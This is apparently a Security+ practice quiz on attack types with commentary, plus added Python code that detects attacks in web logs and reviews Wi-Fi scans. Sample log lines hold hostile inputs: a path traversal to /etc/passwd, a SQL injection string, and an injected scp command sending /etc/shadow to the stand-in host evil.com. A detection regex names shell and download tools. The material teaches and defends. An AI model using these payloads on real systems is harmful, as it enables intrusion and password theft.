
Domain 1 Quiz
-
Assign the attack names at right to the descriptions at left.
You use each attack name once.
Something like "Number 5 matches e", for numbers 1 through 4.
On the real exam, this will take the form of pull-down
menus by each description.
- Walking down the street, you get advertising messages from stores you are walking past
- You hear from friends that contact information they shared only with you seems to be loose on the Internet
- You receive text messages containing random advertisements
- You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
- SPIM
- Bluesnarfing
- Vishing
- Bluejacking
Bluejacking = illicit and unwanted connections, "Bluetooth hijacking", pushing out advertising from the nearby store. I don't know if this is a threat in the real world, but it is in the question pool.
Bluesnarfing = an illicit Bluetooth connection stole your address book.
SPIM = Spam over Instant Messaging.
Vishing = like phishing (non-targeted) but over voice, from spoofed caller numbers. I live in West Lafayette, just down the street from Purdue University, with a large number of foreign students. I get frequent calls from a spoofed Chicago number with a recorded Chinese message with background music. I've been told they're borderline scams from immigration law firms. -
Liz is a security analyst for the IT department of a large
university with a correspondingly large number of users.
She has been investigating a sophisticated
privilege escalation attack.
She has determined that the attacker used an ordinary
user account with a rather large user ID number.
The attack changed that to a very low user ID number,
associated with a highly privileged system account.
Which of these did the attack utilize?
- Improper account configuration
- Memory leak
- Buffer overflow
- Integer overflow
- Race condition
2^32 - 1 = 4,294,967,295
but:
4,294,967,295 + 1 = 0
Don't know too much! That makes it hard. CompTIA is probably posing their question in a 16-bit world, if not an 8-bit one. -
You are equipping a forensics team.
Which of these would be most useful?
- A set of precision screwdrivers
- A cheap camera
- Luminol
- Latex gloves and masks
-
You observe the following.
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
What type of attack has happened?
- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
/etc is the configuration directory on a UNIX-family operating system; the repeated ../ steps up out of the web document root to reach it. -
You observe the following.
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
What type of attack has happened?
- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
%20 is the URL encoding of ASCII 0x20, a space. Notice the string:
scp%20/etc/shadow%20hacker@evil.com
which decodes to:
scp /etc/shadow hacker@evil.com
That's the syntax to use scp to make an SSH connection as user hacker at host evil.com, and copy the file /etc/shadow (which contains the password hashes for the web server host's user accounts!) to that user's home directory on that remote server. -
You observe the following.
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
What type of attack has happened?
- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
The request path decodes to ' OR 1=1 ;-- : a quote to close the string the query was expecting, an always-true OR 1=1 clause, and -- to comment out whatever follows.
An alternative version of this question is a description, "You notice strange punctuation marks in the log." -
You are examining web server logs, and you notice some
unusually long requests.
What type of attack has happened?
- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
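The four log questions above all come down to recognizing an attack from the shape of a request. The following is an added Python example (mine, not part of the quiz) that parses lines in the exhibit's format, percent-decodes the request target (the %20 to space step from the command-injection answer, repeated so that double-encoded ../ is not missed), and flags the four patterns the questions ask about. The sample log is constructed from the quiz's own exhibit lines plus one oversized request that I added from the documentation address 203.0.113.7; the regexes and the 1024-byte length threshold are my assumptions.

```python
import re
from typing import Optional
from urllib.parse import unquote

# One entry of the combined-log-style format shown in the quiz exhibits:
# client - - [timestamp] "METHOD target PROTOCOL" status bytes "referer" ...
# (trailing TLS fields, when present, are ignored by this prefix match)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signature patterns (assumptions; a real deployment tunes these to its site):
# an always-true OR n=n clause, or a quote/semicolon followed by a SQL comment
SQLI_RE = re.compile(r"(?i)\bor\s+\d+\s*=\s*\d+|;\s*--|'\s*--")
# a cmd= parameter, shell metacharacters, or a common remote-copy/download tool name
CMDI_RE = re.compile(r"(?i)[?&]cmd=|[;|`]|\b(?:scp|wget|curl|nc|sh|bash)\b")


def decode_fully(target: str, rounds: int = 3) -> str:
    """Percent-decode until the text stops changing (bounded), so a
    double-encoded %252e%252e/ ends up as ../ just like %2e%2e/ does."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_request(target: str, max_len: int = 1024) -> Optional[str]:
    """Return a verdict for one request target, or None if it looks benign.
    Checks run most-specific first so an injection string is not reported
    merely as 'oversized'."""
    decoded = decode_fully(target)
    if "../" in decoded or "..\\" in decoded:
        return "directory traversal"
    if SQLI_RE.search(decoded):
        return "sql injection"
    if CMDI_RE.search(decoded):
        return "command injection"
    if len(decoded) > max_len:  # the "unusually long request" case
        return "oversized request (possible buffer overflow)"
    return None


def scan_log(text: str):
    """Return a list of (client, timestamp, decoded target, verdict) for flagged lines."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        verdict = classify_request(m["target"])
        if verdict:
            hits.append((m["ip"], m["time"], decode_fully(m["target"]), verdict))
    return hits


# Constructed sample: the quiz's own exhibit lines, plus one oversized
# request from a documentation-range address (203.0.113.7) that I added.
SAMPLE_LOG = "\n".join([
    '66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    "174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] \"GET /database/'%20OR%201=1%20;-- HTTP/1.1\" 200 25310 \"https://www.bing.com/\" - -",
    '203.0.113.7 - - [01/Jul/2020:00:04:01 +0000] "GET /search?q=' + "A" * 3000 + ' HTTP/1.1" 414 0 "-" - -',
    '66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -',
])

if __name__ == "__main__":
    for ip, when, target, verdict in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {when}  {verdict:45} {target[:60]}")
```

Decoding before matching is the point worth remembering: the exhibit lines store the request exactly as the client sent it, so a signature written against the literal text (a space, a quote) misses the same payload sent as %20 or %27.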
-
You observe the following in the results of a security scan.
What is this?
Channel  SSID
1        corpnet3
6        corpnet3
6        netgear
11       corpnet3
- Evil twin
- Rogue AP
- Bluesmacking
- Watering hole
-
Last week Ann, a staff member in the Human Resources
department, did a Google search and clicked on
one of the links on the first page of results.
That took her to a strange page.
She went back, realized she had misspelled her search,
corrected that, and found what she needed.
Today she logged on to her bank site from work and
noticed some mysterious transfers from her account to
a bank in Eastern Europe.
What has happened?
- Clickjacking
- Ransomware
- Crimeware
- Extortionware
- Spyware
-
You observe the following in the results of a security scan.
What is this?
Channel  SSID
1        corpnet3
6        corpnet3
6        corpnet3
11       corpnet3
- Evil twin
- Rogue AP
- Bluesmacking
- Watering hole
In case Bob hasn't remembered to tell you this part yet...
The three useful channels (in the CompTIA universe) are 1, 6, and 11. If you get a "configure this network" diagram involving wireless, carefully look all around it to see what fixed wireless is already there.
If you are configuring the only WAP, use channel 6 as it's the middle of the band and the antenna(s), always a compromise, will work best there.
If you are configuring an additional WAP, and there's already just one on either channel 1 or 11, pick the opposite end.
If there are two others, pick whichever of 1, 6, and 11 aren't yet in use. -
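An added Python example (mine, not part of the quiz) that applies the reasoning behind the two scan exhibits above and the channel notes: it compares a scan against an assumed inventory of authorized APs, reporting an SSID that was never deployed and a corporate SSID seen on more APs than were deployed, and it implements the 1/6/11 rule as stated. The inventory AUTHORIZED, the two scan lists, and what to do when the only existing neighbour is on channel 6 are my assumptions.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed scan results in the shape of the quiz exhibits: (channel, SSID)
SCAN_UNKNOWN_SSID = [(1, "corpnet3"), (6, "corpnet3"), (6, "netgear"), (11, "corpnet3")]
SCAN_EXTRA_CORP_AP = [(1, "corpnet3"), (6, "corpnet3"), (6, "corpnet3"), (11, "corpnet3")]

# Assumed AP inventory: each SSID we operate and the channel of each deployed AP.
AUTHORIZED: Dict[str, List[int]] = {"corpnet3": [1, 6, 11]}


def review_scan(scan: List[Tuple[int, str]], authorized: Dict[str, List[int]]) -> List[Tuple[str, str]]:
    """Compare a scan with the inventory.  Two kinds of finding:
    an SSID we never deployed, and our own SSID seen more often than we
    have APs for it (something extra is announcing our network name)."""
    findings: List[Tuple[str, str]] = []
    seen = defaultdict(list)
    for channel, ssid in scan:
        seen[ssid].append(channel)
    for ssid, channels in seen.items():
        if ssid not in authorized:
            findings.append((ssid, "unknown SSID, not in AP inventory"))
            continue
        # Counter subtraction keeps only the observations the inventory cannot explain
        extra = Counter(channels) - Counter(authorized[ssid])
        if extra:
            findings.append((ssid, "more APs than inventoried, extra on channels %s"
                             % sorted(extra.elements())))
    return findings


def pick_channel(existing: List[int]) -> Optional[int]:
    """The channel rule from the notes above, for the non-overlapping 2.4 GHz
    channels 1/6/11: only WAP -> 6; one other on 1 or 11 -> the opposite end;
    otherwise the first of 1/6/11 not yet in use.  A lone neighbour on 6 and
    the all-three-taken case (returns None) are my own additions."""
    usable = [1, 6, 11]
    in_use = sorted({c for c in existing if c in usable})
    if not in_use:
        return 6
    if in_use == [1]:
        return 11
    if in_use == [11]:
        return 1
    free = [c for c in usable if c not in in_use]
    return free[0] if free else None


if __name__ == "__main__":
    for name, scan in (("scan A", SCAN_UNKNOWN_SSID), ("scan B", SCAN_EXTRA_CORP_AP)):
        print(name, review_scan(scan, AUTHORIZED))
    print("new WAP with one neighbour on 1:", pick_channel([1]))
```

The inventory is what turns a scan into a finding: a list of channels and SSIDs on its own cannot say which corpnet3 is yours, but a count of deployed APs per SSID can say that one too many is answering.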
Shonda, a security auditor at a financial institution,
discovered an advanced attack that had stolen and
exfiltrated a great deal of sensitive information.
She searched a database for details of the attack,
but found nothing.
After a great deal of investigation and research, she
discovered that it seems to be a new vulnerability with
no available patch, and she implemented a workaround.
What did she discover?
- False-positive event
- False-negative event
- Zero-day event
- IDS failure event
- IPS failure event
-
Shari, a network engineer at a major health care facility,
has determined that when the head of the Radiology department
authenticated to the medical image database server,
the encrypted traffic was captured by an intruder.
That intruder later transmitted that information again
to access the database as the highly privileged account.
What type of attack is this?
- APT
- Rootkit
- Rogue AP
- Replay
-
Desmond, a network engineer, has been directed to set up
network security that will require a device to authenticate
itself onto the network and verify that patching and
anti-virus signatures are updated, before allowing the
user to try to authenticate.
What should Desmond use?
- 802.1i
- 802.1x
- 802.1q
- 802.11i
-
Mehmet, the database administrator, has discovered that
a user has accidentally deleted an entire database table.
What went wrong?
- Misconfigured account
- Untrained user
- Inadequate input validation
- Memory leak
-
News reports tell of a major DDoS against a famous company.
Meanwhile, you receive a letter from your ISP saying that your
home computer is sending malicious Linux-sourced traffic.
But you don't own a Linux computer, in fact you don't
own any computer.
Your home electronics are limited to a smart TV
with a Blu-ray player and a DVR.
What has happened?
- Nothing, your ISP is wrong
- RAT
- BOT
- Trojan
-
Jim is a software developer.
Tina, his manager, has asked him to list software design
and development security issues to share with new
team members.
Which of these is the reason for most software
vulnerabilities?
- Improper input handling
- Inadequate error handling
- Support beyond end-of-life
- Default configurations
-
Inga, a security analyst at a government agency,
is inspecting the components of her operating system.
She had identified what looks like a compatibility driver,
but she suspects that it is being used by malware to monitor
keystrokes and steal other data.
If so, what malware technique has she discovered?
- Driver masquerading
- Shimming
- Driver refactoring
- Data flow manipulating
This is an example of CompTIA's focus on memorizing sometimes arbitrary terminology. In the real world there may be other, equally valid, terms. But to get the point on the exam, you have to pick CompTIA's preferred terminology. -
Alexandra is a White Hat penetration tester
doing a Black Box attack.
She is using software to automatically submit queries
to the search form on a web page.
What is she doing?
- Active reconnaissance
- Passive reconnaissance
- Open-source analysis
- Pivoting
-
Jermain has been trying to print a document on a nearby printer.
It is operational; from time to time it produces a print job
and someone from several offices down the hall arrives to
collect their output.
What is probably responsible?
Select two
- Bluesnarfing
- Bluesmacking
- Bluejacking
- Jamming
- Bluesniffing
-
Vladimir has written some malicious software that adds
unneeded loops, NOPs, and other ineffectual code every
time it is executed or spread to a new platform.
What technique is he using?
- Refactoring
- Shimming
- Masquerading
- Modifying
-
Peter is a security analyst at a bank.
The bank wants to extend its use of an outdated
operating system, as the alternative would require
replacing all their existing automated teller machines
built into storefronts and standalone brick kiosks.
What problem will they have to solve?
- Embedded systems
- EOL
- IoT
- Input validation
- Error handling
Exhibit with 4 items plus 20 questions
Passing = 82% of 24 = 19.7
Goal = 91% of 24 = 21.8